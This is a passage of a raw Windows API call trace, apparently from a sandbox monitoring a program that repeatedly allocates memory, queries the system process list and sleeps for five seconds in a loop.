ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.590] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.605] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.606] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.621] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.636] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.638] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.648] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.652] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.666] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.667] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.680] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.683] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.698] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.711] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.714] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.729] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.730] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.743] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.745] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.746] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.760] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.762] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.763] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.773] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.775] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.776] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.789] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.791] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.804] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.807] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.808] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.823] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.836] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.839] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.856] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.874] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.882] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.887] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.887] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.899] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.902] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.918] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.929] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.932] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.948] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.967] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.979] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.007] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.011] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.012] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.028] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.029] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.038] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.042] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.055] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.058] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.074] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.123] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.136] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.150] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.150] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.166] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.180] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.182] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.183] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.198] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.198] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.212] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.215] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.231] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.232] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.241] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0142.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0142.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0142.245] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0142.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, 